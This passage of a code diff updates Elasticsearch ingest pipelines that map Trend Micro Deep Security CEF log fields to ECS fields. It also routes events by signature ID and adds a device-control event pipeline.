trendmicro.deep_security.device.custom_string7.value + ignore_missing: true + - rename: + field: cef.extensions.deviceHostName + tag: rename_cef_extensions_deviceHostName + target_field: trendmicro.deep_security.deviceHostName + ignore_missing: true + - set: + field: observer.hostname + tag: set_observer_hostname_from_deep_security_deviceHostName + copy_from: trendmicro.deep_security.deviceHostName + ignore_empty_value: true + - rename: + field: cef.extensions.filePath + tag: rename_extensions_filePath + target_field: trendmicro.deep_security.file_path + ignore_missing: true + - set: + field: file.path + tag: set_file_path_from_deep_security_file_path + copy_from: trendmicro.deep_security.file_path + ignore_empty_value: true + - rename: + field: cef.extensions.message + tag: rename_extensions_message + target_field: trendmicro.deep_security.message + ignore_missing: true + - convert: + field: cef.extensions.sourceAddress + tag: convert_cef_extensions_sourceAddress_to_ip + target_field: trendmicro.deep_security.source.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sourceAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_deep_security_source_address + copy_from: trendmicro.deep_security.source.address + ignore_empty_value: true + - append: + field: related.ip + tag: append_source_ip_to_related_ip + value: '{{{source.ip}}}' + allow_duplicates: false + if: ctx.source?.ip != null + - geoip: + field: source.ip + tag: geoip_source_ip + target_field: source.geo + ignore_missing: true + - gsub: + field: cef.extensions.sourceMacAddress + tag: gsub_sourceMacAddress + target_field: trendmicro.deep_security.source.mac_address + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: trendmicro.deep_security.source.mac_address + tag: uppercase_source_mac_address + ignore_missing: true + if: ctx.trendmicro?.deep_security?.extensions?.source?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.mac + tag: set_source_mac_from_deep_security_source_mac_address + copy_from: trendmicro.deep_security.source.mac_address + ignore_empty_value: true + - convert: + field: cef.extensions.sourcePort + tag: convert_cef_extensions_sourcePort_to_long + target_field: trendmicro.deep_security.source.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_deep_security_source_port + copy_from: trendmicro.deep_security.source.port + ignore_empty_value: true + - rename: + field: cef.extensions.sourceProcessName + tag: rename_extensions_sourceProcessName + target_field: trendmicro.deep_security.source.process_name + ignore_missing: true + - rename: + field: cef.extensions.sourceUserName + tag: rename_extensions_sourceUserName + target_field: trendmicro.deep_security.source.user_name + ignore_missing: true + - set: + field: source.user.name + tag: set_source_user_name_from_deep_security_source_user_name + copy_from: trendmicro.deep_security.source.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_source_user_name_to_related_user + value: '{{{source.user.name}}}' + allow_duplicates: false + if: ctx.source?.user?.name != null + - rename: + field: cef.extensions.transportProtocol + tag: rename_cef_extensions_transportProtocol + target_field: trendmicro.deep_security.transport_protocol + ignore_missing: true + - set: + field: network.transport + tag: set_network_transport_from_deep_security_transport_protocol + copy_from: trendmicro.deep_security.transport_protocol + ignore_empty_value: true + - lowercase: + field: network.transport + tag: lowercase_network_transport + ignore_missing: true - rename: - field: message - target_field: trendmicro.event.message + field: cef.extensions.TrendMicroDsFrameType + tag: rename_cef_extensions_TrendMicroDsFrameType + target_field: trendmicro.deep_security.trendmicro.ds_frame_type + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsPacketData + tag: rename_cef_extensions_TrendMicroDsPacketData + target_field: trendmicro.deep_security.trendmicro.ds_packet_data + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTenant + tag: rename_cef_extensions_TrendMicroDsTenant + target_field: trendmicro.deep_security.trendmicro.ds_tenant + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTenantId + tag: rename_cef_extensions_TrendMicroDsTenantId + target_field: trendmicro.deep_security.trendmicro.ds_tenant_id + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsTags + tag: rename_cef_extensions_TrendMicroDsTags + target_field: trendmicro.deep_security.trendmicro.ds_tags + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsReasonId + tag: rename_cef_extensions_TrendMicroDsReasonId + target_field: trendmicro.deep_security.trendmicro.ds_reason_id ignore_missing: true - rename: field: cef.name - target_field: trendmicro.event.name + tag: rename_cef_name + target_field: trendmicro.deep_security.name + ignore_missing: true + - convert: + field: cef.severity + tag: convert_cef_severity_to_long + target_field: trendmicro.deep_security.severity + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.severity + tag: set_event_severity_from_deep_security_severity + copy_from: trendmicro.deep_security.severity + ignore_empty_value: true + - rename: + field: cef.version + tag: rename_cef_version + target_field: trendmicro.deep_security.version + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsBehaviorRuleID + tag: rename_extensions_TrendMicroDsBehaviorRuleID + target_field: trendmicro.deep_security.trendmicro.ds_behavior.rule_id + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsBehaviorType + tag: rename_extensions_TrendMicroDsBehaviorType + target_field: trendmicro.deep_security.trendmicro.ds_behavior.type + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsCommandLine + tag: rename_extensions_TrendMicroDsCommandLine + target_field: trendmicro.deep_security.trendmicro.ds_command_line + ignore_missing: true + - set: + field: process.command_line + tag: set_process_command_line + copy_from: trendmicro.deep_security.trendmicro.ds_command_line + ignore_empty_value: true + - rename: + field: cef.extensions.TrendMicroDsCve + tag: rename_extensions_TrendMicroDsCve + target_field: trendmicro.deep_security.trendmicro.ds_cve + ignore_missing: true + - set: + field: vulnerability.id + tag: set_vulnerability_id + copy_from: trendmicro.deep_security.trendmicro.ds_cve + ignore_empty_value: true + - rename: + field: cef.extensions.filename + tag: rename_extensions_filename + target_field: trendmicro.deep_security.filename + ignore_missing: true + - rename: + field: cef.extensions.result + tag: rename_extensions_result + target_field: trendmicro.deep_security.result + ignore_missing: true + - rename: + field: cef.extensions.sourceHostName + tag: rename_extensions_sourceHostName + target_field: trendmicro.deep_security.source.host_name + ignore_missing: true + - rename: + field: cef.extensions.target + tag: rename_extensions_target + target_field: trendmicro.deep_security.target.value + ignore_missing: true + - rename: + field: cef.extensions.targetID + tag: rename_extensions_targetID + target_field: trendmicro.deep_security.target.id + ignore_missing: true + - convert: + field: cef.extensions.TrendMicroDsDetectionConfidence + tag: convert_extensions_TrendMicroDsDetectionConfidence_to_long + target_field: trendmicro.deep_security.trendmicro.ds_detection_confidence + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.TrendMicroDsFileMD5 + tag: rename_extensions_TrendMicroDsFileMD5 + target_field: trendmicro.deep_security.trendmicro.ds_file.md5 + ignore_missing: true + - set: + field: file.hash.md5 + tag: set_file_hash_md5 + copy_from: trendmicro.deep_security.trendmicro.ds_file.md5 + ignore_empty_value: true + - append: + field: related.hash + tag: append_ds_file_md5_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.md5}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.md5 != null + - rename: + field: cef.extensions.TrendMicroDsFileSHA1 + tag: rename_extensions_TrendMicroDsFileSHA1 + target_field: trendmicro.deep_security.trendmicro.ds_file.sha1 + ignore_missing: true + - append: + field: related.hash + tag: append_ds_file_sha1_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.sha1}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.sha1 != null + - set: + field: file.hash.sha1 + tag: set_file_hash_sha1 + copy_from: trendmicro.deep_security.trendmicro.ds_file.sha1 + ignore_empty_value: true + - rename: + field: cef.extensions.TrendMicroDsFileSHA256 + tag: rename_extensions_TrendMicroDsFileSHA256 + target_field: trendmicro.deep_security.trendmicro.ds_file.sha256 + ignore_missing: true + - append: + field: related.hash + tag: append_ds_file_sha256_to_related_hash + value: '{{{trendmicro.deep_security.trendmicro.ds_file.sha256}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.trendmicro?.ds_file?.sha256 != null + - set: + field: file.hash.sha256 + tag: set_file_hash_sha256 + copy_from: trendmicro.deep_security.trendmicro.ds_file.sha256 + ignore_empty_value: true + - convert: + field: cef.extensions.TrendMicroDsMalwareTargetCount + tag: convert_extensions_TrendMicroDsMalwareTargetCount_to_long + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.count + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.TrendMicroDsMalwareTargetType + tag: rename_extensions_TrendMicroDsMalwareTargetType + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.type + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsMalwareTarget + tag: rename_extensions_TrendMicroDsMalwareTarget + target_field: trendmicro.deep_security.trendmicro.ds_malware_target.value + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsMitre + tag: rename_extensions_TrendMicroDsMitre + target_field: trendmicro.deep_security.trendmicro.ds_mitre + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsProcess + tag: rename_extensions_TrendMicroDsProcess + target_field: trendmicro.deep_security.trendmicro.ds_process + ignore_missing: true + - rename: + field: cef.extensions.TrendMicroDsRelevantDetectionNames + tag: rename_extensions_TrendMicroDsRelevantDetectionNames + target_field: trendmicro.deep_security.trendmicro.ds_relevant_detection_names + ignore_missing: true + - community_id: + tag: community_id + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.aggregationType + tag: rename_extensions_aggregationType + target_field: trendmicro.deep_security.aggregation_type + ignore_missing: true + - rename: + field: cef.extensions.computerName + tag: rename_extensions_computerName + target_field: trendmicro.deep_security.computer_name + ignore_missing: true + - set: + field: host.hostname + tag: set_host_hostname + copy_from: trendmicro.deep_security.computer_name + ignore_empty_value: true + - rename: + field: cef.extensions.destinationUserName + tag: rename_extensions_destinationUserName + target_field: trendmicro.deep_security.destination.user_name + ignore_missing: true + - set: + field: destination.user.name + tag: set_destination_user_name_from_deep_security_destination_user_name + copy_from: trendmicro.deep_security.destination.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_destination_user_name_to_related_user + value: '{{{destination.user.name}}}' + allow_duplicates: false + if: ctx.destination?.user?.name != null + - rename: + field: cef.extensions.deviceType + tag: rename_extensions_deviceType + target_field: trendmicro.deep_security.type + ignore_missing: true + - rename: + field: cef.extensions.domainName + tag: rename_extensions_domainName + target_field: trendmicro.deep_security.domain_name + ignore_missing: true + - rename: + field: cef.extensions.fileHash + tag: rename_extensions_fileHash + target_field: trendmicro.deep_security.file.hash + ignore_missing: true + - set: + field: file.hash.sha256 + tag: set_file_hash_sha256_from_deep_security_file_hash + copy_from: trendmicro.deep_security.file.hash + ignore_empty_value: true + - append: + field: related.hash + tag: append_file_hash_sha256_to_related_hash + value: '{{{file.hash.sha256}}}' + allow_duplicates: false + if: ctx.file?.hash?.sha256 != null + - convert: + field: cef.extensions.fileSize + tag: convert_extensions_fileSize_to_long + target_field: trendmicro.deep_security.file.size + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: file.size + tag: set_file_size_from_deep_security_file_size + copy_from: trendmicro.deep_security.file.size + ignore_empty_value: true + - rename: + field: cef.extensions.model + tag: rename_extensions_model + target_field: trendmicro.deep_security.model ignore_missing: true + - set: + field: device.model.identifier + tag: set_device_model_identifier + copy_from: trendmicro.deep_security.model + ignore_empty_value: true + - rename: + field: cef.extensions.permission + tag: rename_extensions_permission + target_field: trendmicro.deep_security.permission + ignore_missing: true + - rename: + field: cef.extensions.processName + tag: rename_extensions_processName + target_field: trendmicro.deep_security.process.name + ignore_missing: true + - set: + field: process.name + tag: set_process_name_from_deep_security_process_name + copy_from: trendmicro.deep_security.process.name + ignore_empty_value: true + - rename: + field: cef.extensions.repeatCount + tag: rename_extensions_repeatCount + target_field: trendmicro.deep_security.repeat_count + ignore_missing: true + - rename: + field: cef.extensions.requestUrl + tag: rename_extensions_requestUrl + target_field: trendmicro.deep_security.request_url + ignore_missing: true + - set: + field: url.original + tag: set_url_original + copy_from: trendmicro.deep_security.request_url + ignore_empty_value: true + - rename: + field: cef.extensions.serial + tag: rename_extensions_serial + target_field: trendmicro.deep_security.serial + ignore_missing: true + - rename: + field: cef.extensions.sourceUserId + tag: rename_extensions_sourceUserId + target_field: trendmicro.deep_security.source.user_id + ignore_missing: true + - set: + field: source.user.id + tag: set_source_user_id_from_deep_security_source_user_id + copy_from: trendmicro.deep_security.source.user_id + ignore_empty_value: true + - append: + field: related.user + tag: append_source_user_id_to_related_user + value: '{{{source.user.id}}}' + allow_duplicates: false + if: ctx.source?.user?.id != null - convert: - field: trendmicro.event.signature_id - type: integer + field: cef.extensions.xff + tag: convert_extensions_xff_to_ip + target_field: trendmicro.deep_security.xff + type: ip ignore_missing: true + if: ctx.cef?.extensions?.xff != '' on_failure: - - remove: - field: trendmicro.event.signature_id - ignore_missing: true - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' - + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_xff_to_related_ip + value: '{{{trendmicro.deep_security.xff}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.xff != null # pipeline per signature id - pipeline: name: '{{ IngestPipeline "application-control-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 6000000 && ctx.trendmicro?.event?.signature_id <= 6999999" + tag: pipeline_application_control_event + if: ctx.trendmicro?.deep_security?.signature_id >= 6000000 && ctx.trendmicro.deep_security.signature_id <= 6999999 - pipeline: name: '{{ IngestPipeline "firewall-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 20 || ctx.trendmicro?.event?.signature_id == 21" + tag: pipeline_firewall_event + if: ctx.trendmicro?.deep_security?.signature_id == 20 || ctx.trendmicro.deep_security.signature_id == 21 - pipeline: name: '{{ IngestPipeline "intrusion-prevention-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 10 || (ctx.trendmicro?.event?.signature_id >= 1000000 && ctx.trendmicro?.event?.signature_id <= 1999999)" + tag: pipeline_intrusion_prevention_event + if: ctx.trendmicro?.deep_security?.signature_id == 10 || (ctx.trendmicro.deep_security.signature_id >= 1000000 && ctx.trendmicro.deep_security.signature_id <= 1999999) - pipeline: name: '{{ IngestPipeline "integrity-monitoring-event" }}' - if: "ctx.trendmicro?.event?.signature_id == 30 || (ctx.trendmicro?.event?.signature_id >= 2000000 && ctx.trendmicro?.event?.signature_id <= 2999999)" + tag: pipeline_integrity_monitoring_event + if: ctx.trendmicro?.deep_security?.signature_id == 30 || (ctx.trendmicro.deep_security.signature_id >= 2000000 && ctx.trendmicro.deep_security.signature_id <= 2999999) - pipeline: name: '{{ IngestPipeline "malware-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 4000000 && ctx.trendmicro?.event?.signature_id <= 4999999" + tag: pipeline_malware_event + if: ctx.trendmicro?.deep_security?.signature_id >= 4000000 && ctx.trendmicro.deep_security.signature_id <= 4999999 - pipeline: name: '{{ IngestPipeline "system-event" }}' - if: "ctx.trendmicro?.event?.signature_id >= 100 && ctx.trendmicro?.event?.signature_id <= 7499" + tag: pipeline_system_event + if: ctx.trendmicro?.deep_security?.signature_id >= 100 && ctx.trendmicro.deep_security.signature_id <= 7499 - pipeline: name: '{{ IngestPipeline "log-inspection" }}' - if: "ctx.trendmicro?.event?.signature_id == 40 || (ctx.trendmicro?.event?.signature_id >= 3000000 && ctx.trendmicro?.event?.signature_id <= 3999999)" + tag: pipeline_log_inspection + if: ctx.trendmicro?.deep_security?.signature_id == 40 || (ctx.trendmicro.deep_security.signature_id >= 3000000 && ctx.trendmicro.deep_security.signature_id <= 3999999) - pipeline: name: '{{ IngestPipeline "web-reputation" }}' - if: "ctx.trendmicro?.event?.signature_id >= 5000000 && ctx.trendmicro?.event?.signature_id <= 5999999" - - - convert: - field: file.size - type: long - ignore_missing: true - on_failure: - - remove: - field: file.size - ignore_missing: true - - append: - field: error.message - value: '{{{_ingest.on_failure_message}}}' - - - remove: - field: - - cef - ignore_missing: true - # + tag: pipeline_web_reputation + if: ctx.trendmicro?.deep_security?.signature_id >= 5000000 && ctx.trendmicro.deep_security.signature_id <= 5999999 + - pipeline: + name: '{{ IngestPipeline "device-control-event" }}' + tag: pipeline_device_control_event + if: ctx.trendmicro?.deep_security?.signature_id >= 7000000 && ctx.trendmicro.deep_security.signature_id <= 7999999 # Timestamp parsing. - # - grok: # decode_cef sets @timestamp when deviceReceiptTime is provided. description: Extract timestamp from log header when deviceReceiptTime not given. + tag: grok_extract_timestamp if: ctx.cef?.extensions?.deviceReceiptTime == null field: event.original patterns: @@ -86,29 +865,132 @@ processors: ECS_SYSLOG_PRI: "<%{NONNEGINT:log.syslog.priority:long}>" SYSLOG_TIMESTAMP: "(?:%{SYSLOGTIMESTAMP:_tmp.timestamp}|%{TIMESTAMP_ISO8601:_tmp.timestamp8601})" - date: - if: ctx._tmp?.timestamp8601 != null field: _tmp.timestamp8601 + tag: date_tmp_timestamp8601 + if: ctx._tmp?.timestamp8601 != null && ctx.event?.timezone == null formats: - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - if: ctx._tmp?.timestamp != null field: _tmp.timestamp + tag: date_tmp_timestamp + if: ctx._tmp?.timestamp != null && ctx.event?.timezone == null formats: - MMM d HH:mm:ss - MMM dd HH:mm:ss + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.tz_offset + target_field: event.timezone + if: ctx._conf?.tz_offset != null + tag: 'rename_tz_offset' + ignore_missing: true + - date: + field: _tmp.timestamp8601 + tag: date_tmp_timestamp8601_tz + timezone: '{{{event.timezone}}}' + if: ctx._tmp?.timestamp8601 != null && ctx.event?.timezone != null + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: _tmp.timestamp + tag: date_tmp_timestamp_tz + timezone: '{{{event.timezone}}}' + if: ctx._tmp?.timestamp != null && ctx.event?.timezone != null + formats: + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: - - _tmp + - trendmicro.deep_security.filename + - trendmicro.deep_security.source.host_name + - trendmicro.deep_security.event_class_id + - trendmicro.deep_security.device.product + - trendmicro.deep_security.device.vendor + - trendmicro.deep_security.device.version + - trendmicro.deep_security.bytes_in + - trendmicro.deep_security.destination.address + - trendmicro.deep_security.destination.mac_address + - trendmicro.deep_security.destination.port + - trendmicro.deep_security.device.custom_number1.value + - trendmicro.deep_security.deviceHostName + - trendmicro.deep_security.file_path + - trendmicro.deep_security.message + - trendmicro.deep_security.source.address + - trendmicro.deep_security.source.mac_address + - trendmicro.deep_security.source.port + - trendmicro.deep_security.source.user_name + - trendmicro.deep_security.transport_protocol + - trendmicro.deep_security.name + - trendmicro.deep_security.severity + - trendmicro.deep_security.destination.user_name + - trendmicro.deep_security.file.hash + - trendmicro.deep_security.file.size + - trendmicro.deep_security.process.name + - trendmicro.deep_security.source.user_id + - trendmicro.deep_security.request_url + - trendmicro.deep_security.trendmicro.ds_cve + - trendmicro.deep_security.trendmicro.ds_file.md5 + - trendmicro.deep_security.trendmicro.ds_file.sha1 + - trendmicro.deep_security.trendmicro.ds_file.sha256 + - trendmicro.deep_security.model + - trendmicro.deep_security.computer_name + - trendmicro.deep_security.trendmicro.ds_command_line + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: + - _tmp + - cef + tag: remove_cef_and_tmp ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + tag: remove_event_original ignore_missing: true - -on_failure: - - set: + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(v -> drop(v)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(v -> drop(v)); + return (((List) object).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: field: event.kind value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml new file mode 100644 index 00000000000..9bc659a7e57 --- /dev/null +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/device-control-event.yml @@ -0,0 +1,24 @@ +--- +description: Pipeline for processing Application Control event logs. +processors: + - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: device-control-event + - append: + field: event.category + tag: set_event_category + value: intrusion_detection + allow_duplicates: false + - append: + field: event.type + tag: set_event_type + value: info + allow_duplicates: false +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml index 9f66a5a2ff3..4d1a03dbeb8 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/firewall-event.yml @@ -2,87 +2,23 @@ description: Pipeline for processing Firewall event logs processors: - set: - field: trendmicro.event.category - value: "firewall" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: firewall-event + - append: field: event.category - value: ["network"] - - set: + tag: set_event_category + value: network + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: baseEventCount - to: trendmicro.event.count - - name: deviceCustomString2 - to: trendmicro.event.tcp_flag - - name: deviceCustomString3 - to: trendmicro.event.packet_fragmentation - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsFrameType - to: trendmicro.event.ethernet_frame_type - - name: TrendMicroDsPacketData - to: trendmicro.event.packet_data - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - ignore_empty_value: true - - - remove: - field: - - _tmp_copy - ignore_missing: true - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml index 20909e79e49..f7590f97d9a 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/integrity-monitoring-event.yml @@ -2,75 +2,23 @@ description: Pipeline for processing Integrity Monitoring event logs processors: - set: - field: trendmicro.event.category - value: "integrity-monitor" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: integrity-monitoring-log-event + - append: field: event.category - value: ["configuration"] - - set: + tag: set_event_category + value: configuration + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: oldFilePath - to: trendmicro.event.old_file_path - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml index 0b8200330d5..b9cf04e2b78 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/intrusion-prevention-event.yml @@ -2,89 +2,23 @@ description: Pipeline for processing Intrusion Prevention event logs processors: - set: - field: trendmicro.event.category - value: "intrusion-prevention" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: intrusion-prevention-event + - append: field: event.category - value: ["intrusion_detection"] - - set: + tag: set_event_category + value: intrusion_detection + allow_duplicates: false + - append: field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsFrameType - to: trendmicro.event.ethernet_frame_type - - name: 